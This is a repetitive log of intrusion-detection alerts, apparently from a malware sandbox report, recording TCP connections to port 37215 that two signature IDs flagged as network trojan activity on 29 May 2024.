                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929640
                SID:2829579
                Source Port:44556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175102
                SID:2835222
                Source Port:44786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841440
                SID:2835222
                Source Port:49472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180051
                SID:2829579
                Source Port:43944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522120
                SID:2829579
                Source Port:48696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710694
                SID:2835222
                Source Port:46186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946835
                SID:2835222
                Source Port:38816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466058
                SID:2835222
                Source Port:38700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959058
                SID:2835222
                Source Port:47720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474679
                SID:2835222
                Source Port:43616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929989
                SID:2835222
                Source Port:41486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713261
                SID:2829579
                Source Port:53446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896985
                SID:2829579
                Source Port:42044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681603
                SID:2829579
                Source Port:47334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796170
                SID:2835222
                Source Port:47402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845799
                SID:2835222
                Source Port:57950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231243
                SID:2835222
                Source Port:42836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216667
                SID:2835222
                Source Port:41562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911219
                SID:2835222
                Source Port:36160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179830
                SID:2835222
                Source Port:42104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498952
                SID:2829579
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968606
                SID:2835222
                Source Port:54926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664242
                SID:2829579
                Source Port:47028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385396
                SID:2829579
                Source Port:36704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032493
                SID:2829579
                Source Port:45002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263565
                SID:2829579
                Source Port:42702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430817
                SID:2835222
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363126
                SID:2829579
                Source Port:43334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628157
                SID:2835222
                Source Port:48714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464181
                SID:2829579
                Source Port:48412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715138
                SID:2829579
                Source Port:32918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810389
                SID:2835222
                Source Port:54660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966823
                SID:2829579
                Source Port:50188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770321
                SID:2829579
                Source Port:52184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112939
                SID:2829579
                Source Port:41620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716873
                SID:2829579
                Source Port:40714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951482
                SID:2829579
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160265
                SID:2835222
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965844
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850054
                SID:2835222
                Source Port:59894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726940
                SID:2829579
                Source Port:49374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789287
                SID:2829579
                Source Port:54710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131749
                SID:2835222
                Source Port:54176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614312
                SID:2829579
                Source Port:36112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262705
                SID:2829579
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039335
                SID:2829579
                Source Port:35738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266090
                SID:2829579
                Source Port:60874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.454032
                SID:2835222
                Source Port:57702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042834
                SID:2829579
                Source Port:38936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149244
                SID:2835222
                Source Port:60572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498537
                SID:2835222
                Source Port:46310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916233
                SID:2829579
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325042
                SID:2835222
                Source Port:52812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415767
                SID:2829579
                Source Port:60110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166571
                SID:2829579
                Source Port:52416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320126
                SID:2829579
                Source Port:58406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728696
                SID:2835222
                Source Port:60608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170639
                SID:2835222
                Source Port:56222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673478
                SID:2829579
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726992
                SID:2829579
                Source Port:55054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207547
                SID:2829579
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166433
                SID:2835222
                Source Port:43824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419427
                SID:2835222
                Source Port:50712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445256
                SID:2835222
                Source Port:49726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784691
                SID:2829579
                Source Port:60758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.029609
                SID:2829579
                Source Port:41286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385731
                SID:2829579
                Source Port:49116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224007
                SID:2829579
                Source Port:46842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.704982
                SID:2829579
                Source Port:35316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665780
                SID:2835222
                Source Port:45466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868251
                SID:2835222
                Source Port:54142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.396099
                SID:2829579
                Source Port:56142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173328
                SID:2835222
                Source Port:60238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500462
                SID:2835222
                Source Port:33874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028056
                SID:2835222
                Source Port:51254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.727874
                SID:2829579
                Source Port:50390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416807
                SID:2829579
                Source Port:43604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257284
                SID:2835222
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267871
                SID:2835222
                Source Port:42838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951281
                SID:2829579
                Source Port:46674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765201
                SID:2835222
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111128
                SID:2829579
                Source Port:42712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842429
                SID:2835222
                Source Port:42548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318387
                SID:2835222
                Source Port:46560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559707
                SID:2835222
                Source Port:49322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088610
                SID:2835222
                Source Port:32982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570138
                SID:2829579
                Source Port:44570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028088
                SID:2835222
                Source Port:39544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742631
                SID:2829579
                Source Port:48984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860294
                SID:2829579
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986467
                SID:2835222
                Source Port:35854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561999
                SID:2835222
                Source Port:60674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891146
                SID:2829579
                Source Port:55538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278640
                SID:2829579
                Source Port:56326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236723
                SID:2835222
                Source Port:50698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332662
                SID:2835222
                Source Port:33478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337279
                SID:2835222
                Source Port:33920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084815
                SID:2829579
                Source Port:40882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975367
                SID:2835222
                Source Port:41566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570095
                SID:2835222
                Source Port:40960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982114
                SID:2835222
                Source Port:46888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803229
                SID:2835222
                Source Port:49308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925430
                SID:2835222
                Source Port:57668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814522
                SID:2835222
                Source Port:32966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982931
                SID:2829579
                Source Port:36996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733012
                SID:2835222
                Source Port:59984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960616
                SID:2829579
                Source Port:53658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687898
                SID:2829579
                Source Port:52520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113285
                SID:2829579
                Source Port:55510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614337
                SID:2829579
                Source Port:40698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872582
                SID:2829579
                Source Port:37846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976408
                SID:2835222
                Source Port:45792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440824
                SID:2829579
                Source Port:40830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961883
                SID:2829579
                Source Port:39344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419253
                SID:2835222
                Source Port:53500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855926
                SID:2835222
                Source Port:41550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519153
                SID:2835222
                Source Port:32930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624831
                SID:2835222
                Source Port:32932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920909
                SID:2835222
                Source Port:33158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160424
                SID:2835222
                Source Port:52768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763177
                SID:2829579
                Source Port:58762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026754
                SID:2835222
                Source Port:56394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982219
                SID:2835222
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523902
                SID:2829579
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440031
                SID:2835222
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631937
                SID:2829579
                Source Port:41840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.817394
                SID:2835222
                Source Port:47582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597987
                SID:2835222
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630550
                SID:2829579
                Source Port:37924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414973
                SID:2829579
                Source Port:47716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854519
                SID:2835222
                Source Port:49566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584962
                SID:2835222
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653562
                SID:2829579
                Source Port:39576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670432
                SID:2835222
                Source Port:54926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087254
                SID:2835222
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668663
                SID:2829579
                Source Port:46144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136047
                SID:2835222
                Source Port:51570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091679
                SID:2835222
                Source Port:48096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785428
                SID:2835222
                Source Port:36832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519838
                SID:2829579
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899607
                SID:2835222
                Source Port:52490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.389775
                SID:2835222
                Source Port:52340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949594
                SID:2835222
                Source Port:40920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141803
                SID:2829579
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713036
                SID:2835222
                Source Port:51392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841744
                SID:2829579
                Source Port:37698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848471
                SID:2829579
                Source Port:46048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509864
                SID:2835222
                Source Port:58624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446422
                SID:2835222
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705901
                SID:2835222
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170193
                SID:2835222
                Source Port:50200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871895
                SID:2835222
                Source Port:45882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215625
                SID:2829579
                Source Port:56040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782450
                SID:2835222
                Source Port:39656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659922
                SID:2829579
                Source Port:45088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562102
                SID:2835222
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994479
                SID:2835222
                Source Port:41458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445644
                SID:2829579
                Source Port:34272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583243
                SID:2835222
                Source Port:47110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965525
                SID:2835222
                Source Port:50702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815008
                SID:2835222
                Source Port:53232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209309
                SID:2835222
                Source Port:58846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847301
                SID:2835222
                Source Port:49436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893225
                SID:2829579
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868229
                SID:2835222
                Source Port:45748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864380
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716145
                SID:2835222
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612302
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039335
                SID:2835222
                Source Port:54026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372190
                SID:2829579
                Source Port:35088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988777
                SID:2829579
                Source Port:47570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162170
                SID:2829579
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555792
                SID:2829579
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993799
                SID:2829579
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653345
                SID:2829579
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069670
                SID:2835222
                Source Port:37860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702651
                SID:2835222
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806031
                SID:2835222
                Source Port:60940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535641
                SID:2829579
                Source Port:58058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572668
                SID:2829579
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669424
                SID:2835222
                Source Port:45746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624598
                SID:2835222
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567788
                SID:2835222
                Source Port:48074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287477
                SID:2835222
                Source Port:49368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464772
                SID:2835222
                Source Port:42524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279462
                SID:2835222
                Source Port:46068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848193
                SID:2829579
                Source Port:48608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278836
                SID:2835222
                Source Port:60648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140995
                SID:2829579
                Source Port:47754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655962
                SID:2829579
                Source Port:49558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335428
                SID:2835222
                Source Port:59694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813107
                SID:2829579
                Source Port:45480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036698
                SID:2829579
                Source Port:33052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036788
                SID:2829579
                Source Port:42576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558530
                SID:2835222
                Source Port:47760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464748
                SID:2835222
                Source Port:35492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654369
                SID:2835222
                Source Port:33950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
